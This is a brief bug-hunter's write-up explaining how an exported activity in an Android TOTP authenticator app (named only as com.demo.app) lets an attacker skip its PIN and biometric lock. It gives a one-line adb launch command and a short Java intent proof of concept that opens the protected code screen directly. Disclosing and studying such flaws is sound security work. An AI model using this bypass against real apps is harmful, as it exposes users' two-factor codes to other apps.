Bypass the Password and Biometrics Functionalities

A simple story about me

Learned about web application testing online during the COVID-19 period. Did testing on multiple web apps but if I reported any bugs it may informational and duplicates. Then I was curious about android app development so I learned about developing apps. Then I could able to find security issues in android apps. It is like low-hanging fruit — bugs

Analyzing

I used an app for 2FA to get TOTP. Little curious about the applock function so I decompiled the app using JADX-GUI(a tool to decompile the apk) and saw the Androidmanifest.xml file to get the details of the app. [com.demo.app.HandleRedirectionActivity] is exported=true(means any app can call this activity ) so read the code of the activity it doesn’t have anything to read it is just redirection_handler activity. Jumped into app_lock [com.demo.app.PinLock while analyzing the code I get to know it doesn’t validate the activity call.

Exploiting

Then I call the redirection activity directly using ADB. Haa!! app lock activity doesn’t authenticate the redirection_handler activity.

$ adb shell am start -n com.demo.app/.HandleRedirectionActivity

Creating POC

Most of the VDP programs don’t allow to use of the ADB. So I Created an Android Application in Android Studio.

intent intent = new Intent();

intent.setClassName(“com.demo.app”, “com.demo.app.HandleRedirectionActivity”);

startActivity(intent);

Just Create an app to call the redirection_handler activity, when you open the attacker app it bypassed the biometric entry into the TOTP activity

LinkedIn profile: Barath Stalin